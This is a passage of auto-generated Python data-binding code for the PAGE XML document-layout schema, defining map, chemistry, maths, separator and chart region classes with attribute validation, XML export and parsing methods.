super(globals().get("MapRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
self.orientation = _cast(float, orientation)
self.orientation_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, MapRegionType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if MapRegionType.subclass:
return MapRegionType.subclass(*args_, **kwargs_)
else:
return MapRegionType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_orientation(self):
return self.orientation
def set_orientation(self, orientation):
self.orientation = orientation
def hasContent_(self):
if (
super(MapRegionType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='MapRegionType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('MapRegionType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'MapRegionType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='MapRegionType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='MapRegionType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='MapRegionType'):
super(MapRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='MapRegionType')
if self.orientation is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='MapRegionType', fromsubclass_=False, pretty_print=True):
super(MapRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('orientation', node)
if value is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
value = self.gds_parse_float(value, node, 'orientation')
self.orientation = value
super(MapRegionType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
super(MapRegionType, self).buildChildren(child_, node, nodeName_, True)
pass
# end class MapRegionType
class ChemRegionType(RegionType):
"""Regions containing chemical formulas.
The angle the rectangle encapsulating a
region has to be rotated in clockwise
direction in order to correct the present
skew (negative values indicate
anti-clockwise rotation). Range:
-179.999,180
The background colour of the region"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
MemberSpec_('bgColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
]
subclass = None
superclass = RegionType
def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, bgColour=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
super(globals().get("ChemRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
self.orientation = _cast(float, orientation)
self.orientation_nsprefix_ = None
self.bgColour = _cast(None, bgColour)
self.bgColour_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, ChemRegionType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if ChemRegionType.subclass:
return ChemRegionType.subclass(*args_, **kwargs_)
else:
return ChemRegionType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_orientation(self):
return self.orientation
def set_orientation(self, orientation):
self.orientation = orientation
def get_bgColour(self):
return self.bgColour
def set_bgColour(self, bgColour):
self.bgColour = bgColour
def validate_ColourSimpleType(self, value):
# Validate type pc:ColourSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['black', 'blue', 'brown', 'cyan', 'green', 'grey', 'indigo', 'magenta', 'orange', 'pink', 'red', 'turquoise', 'violet', 'white', 'yellow', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ColourSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
super(ChemRegionType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='ChemRegionType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('ChemRegionType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'ChemRegionType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ChemRegionType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='ChemRegionType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='ChemRegionType'):
super(ChemRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ChemRegionType')
if self.orientation is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
if self.bgColour is not None and 'bgColour' not in already_processed:
already_processed.add('bgColour')
outfile.write(' bgColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.bgColour), input_name='bgColour')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='ChemRegionType', fromsubclass_=False, pretty_print=True):
super(ChemRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('orientation', node)
if value is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
value = self.gds_parse_float(value, node, 'orientation')
self.orientation = value
value = find_attr_value_('bgColour', node)
if value is not None and 'bgColour' not in already_processed:
already_processed.add('bgColour')
self.bgColour = value
self.validate_ColourSimpleType(self.bgColour) # validate type ColourSimpleType
super(ChemRegionType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
super(ChemRegionType, self).buildChildren(child_, node, nodeName_, True)
pass
# end class ChemRegionType
class MathsRegionType(RegionType):
"""Regions containing equations and mathematical symbols
should be marked as maths regions.
The angle the rectangle encapsulating a region
has to be rotated in clockwise direction
in order to correct the present skew
(negative values indicate anti-clockwise rotation).
Range: -179.999,180
The background colour of the region"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
MemberSpec_('bgColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
]
subclass = None
superclass = RegionType
def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, bgColour=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
super(globals().get("MathsRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
self.orientation = _cast(float, orientation)
self.orientation_nsprefix_ = None
self.bgColour = _cast(None, bgColour)
self.bgColour_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, MathsRegionType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if MathsRegionType.subclass:
return MathsRegionType.subclass(*args_, **kwargs_)
else:
return MathsRegionType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_orientation(self):
return self.orientation
def set_orientation(self, orientation):
self.orientation = orientation
def get_bgColour(self):
return self.bgColour
def set_bgColour(self, bgColour):
self.bgColour = bgColour
def validate_ColourSimpleType(self, value):
# Validate type pc:ColourSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['black', 'blue', 'brown', 'cyan', 'green', 'grey', 'indigo', 'magenta', 'orange', 'pink', 'red', 'turquoise', 'violet', 'white', 'yellow', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ColourSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
super(MathsRegionType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='MathsRegionType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('MathsRegionType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'MathsRegionType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='MathsRegionType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='MathsRegionType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='MathsRegionType'):
super(MathsRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='MathsRegionType')
if self.orientation is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
if self.bgColour is not None and 'bgColour' not in already_processed:
already_processed.add('bgColour')
outfile.write(' bgColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.bgColour), input_name='bgColour')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='MathsRegionType', fromsubclass_=False, pretty_print=True):
super(MathsRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('orientation', node)
if value is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
value = self.gds_parse_float(value, node, 'orientation')
self.orientation = value
value = find_attr_value_('bgColour', node)
if value is not None and 'bgColour' not in already_processed:
already_processed.add('bgColour')
self.bgColour = value
self.validate_ColourSimpleType(self.bgColour) # validate type ColourSimpleType
super(MathsRegionType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
super(MathsRegionType, self).buildChildren(child_, node, nodeName_, True)
pass
# end class MathsRegionType
class SeparatorRegionType(RegionType):
"""Separators are lines that lie between columns and
paragraphs and can be used to logically separate
different articles from each other.
The angle the rectangle encapsulating a region
has to be rotated in clockwise direction
in order to correct the present skew
(negative values indicate anti-clockwise rotation).
Range: -179.999,180
The colour of the separator"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
MemberSpec_('colour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
]
subclass = None
superclass = RegionType
def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, colour=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
super(globals().get("SeparatorRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
self.orientation = _cast(float, orientation)
self.orientation_nsprefix_ = None
self.colour = _cast(None, colour)
self.colour_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, SeparatorRegionType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if SeparatorRegionType.subclass:
return SeparatorRegionType.subclass(*args_, **kwargs_)
else:
return SeparatorRegionType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_orientation(self):
return self.orientation
def set_orientation(self, orientation):
self.orientation = orientation
def get_colour(self):
return self.colour
def set_colour(self, colour):
self.colour = colour
def validate_ColourSimpleType(self, value):
# Validate type pc:ColourSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['black', 'blue', 'brown', 'cyan', 'green', 'grey', 'indigo', 'magenta', 'orange', 'pink', 'red', 'turquoise', 'violet', 'white', 'yellow', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ColourSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
super(SeparatorRegionType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='SeparatorRegionType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('SeparatorRegionType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'SeparatorRegionType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='SeparatorRegionType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='SeparatorRegionType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='SeparatorRegionType'):
super(SeparatorRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='SeparatorRegionType')
if self.orientation is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
if self.colour is not None and 'colour' not in already_processed:
already_processed.add('colour')
outfile.write(' colour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.colour), input_name='colour')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='SeparatorRegionType', fromsubclass_=False, pretty_print=True):
super(SeparatorRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('orientation', node)
if value is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
value = self.gds_parse_float(value, node, 'orientation')
self.orientation = value
value = find_attr_value_('colour', node)
if value is not None and 'colour' not in already_processed:
already_processed.add('colour')
self.colour = value
self.validate_ColourSimpleType(self.colour) # validate type ColourSimpleType
super(SeparatorRegionType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
super(SeparatorRegionType, self).buildChildren(child_, node, nodeName_, True)
pass
# end class SeparatorRegionType
class ChartRegionType(RegionType):
"""Regions containing charts or graphs of any type, should
be marked as chart regions.
The angle the rectangle encapsulating a region
has to be rotated in clockwise direction
in order to correct the present skew
(negative values indicate anti-clockwise rotation).
Range: -179.999,180
The type of chart in the region
An approximation of the number of colours
used in the region
The background colour of the region
Specifies whether the region also contains
text"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
MemberSpec_('type_', 'pc:ChartTypeSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('numColours', 'int', 0, 1, {'use': 'optional'}),
MemberSpec_('bgColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('embText', 'boolean', 0, 1, {'use': 'optional'}),
]
subclass = None
superclass = RegionType
def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, type_=None, numColours=None, bgColour=None, embText=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
super(globals().get("ChartRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
self.orientation = _cast(float, orientation)
self.orientation_nsprefix_ = None
self.type_ = _cast(None, type_)
self.type__nsprefix_ = None
self.numColours = _cast(int, numColours)
self.numColours_nsprefix_ = None
self.bgColour = _cast(None, bgColour)
self.bgColour_nsprefix_ = None
self.embText = _cast(bool, embText)
self.embText_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, ChartRegionType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if ChartRegionType.subclass:
return ChartRegionType.subclass(*args_, **kwargs_)
else:
return ChartRegionType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_orientation(self):
return self.orientation
def set_orientation(self, orientation):
self.orientation = orientation
def get_type(self):
return self.type_
def set_type(self, type_):
self.type_ = type_
def get_numColours(self):
return self.numColours
def set_numColours(self, numColours):
self.numColours = numColours
def get_bgColour(self):
return self.bgColour
def set_bgColour(self, bgColour):
self.bgColour = bgColour
def get_embText(self):
return self.embText
def set_embText(self, embText):
self.embText = embText
def validate_ChartTypeSimpleType(self, value):
# Validate type pc:ChartTypeSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['bar', 'line', 'pie', 'scatter', 'surface', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ChartTypeSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ColourSimpleType(self, value):
# Validate type pc:ColourSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['black', 'blue', 'brown', 'cyan', 'green', 'grey', 'indigo', 'magenta', 'orange', 'pink', 'red', 'turquoise', 'violet', 'white', 'yellow', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ColourSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
super(ChartRegionType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='ChartRegionType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('ChartRegionType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'ChartRegionType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ChartRegionType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='ChartRegionType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='ChartRegionType'):
super(ChartRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ChartRegionType')
if self.orientation is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.add('type_')
outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
if self.numColours is not None and 'numColours' not in already_processed:
already_processed.add('numColours')
outfile.write(' numColours="%s"' % self.gds_format_integer(self.numColours, input_name='numColours'))
if self.bgColour is not None and 'bgColour' not in already_processed:
already_processed.add('bgColour')
outfile.write(' bgColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.bgColour), input_name='bgColour')), ))
if self.embText is not None and 'embText' not in already_processed:
already_processed.add('embText')
outfile.write(' embText="%s"' % self.gds_format_boolean(self.embText, input_name='embText'))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='ChartRegionType', fromsubclass_=False, pretty_print=True):
super(ChartRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('orientation', node)
if value is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
value = self.gds_parse_float(value, node, 'orientation')
self.orientation = value
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.add('type')
self.type_ = value
self.validate_ChartTypeSimpleType(self.type_) # validate type ChartTypeSimpleType
value = find_attr_value_('numColours', node)
if value is not None and 'numColours' not in already_processed:
already_processed.add('numColours')
self.numColours = self.gds_parse_integer(value, node, 'numColours')
value = find_attr_value_('bgColour', node)
if value is not None and 'bgColour' not in already_processed:
already_processed.add('bgColour')
self.bgColour = value
self.validate_ColourSimpleType(self.bgColour) # validate type ColourSimpleType
value = find_attr_value_('embText', node)
if value is not None and 'embText' not in already_processed:
already_processed.add('embText')
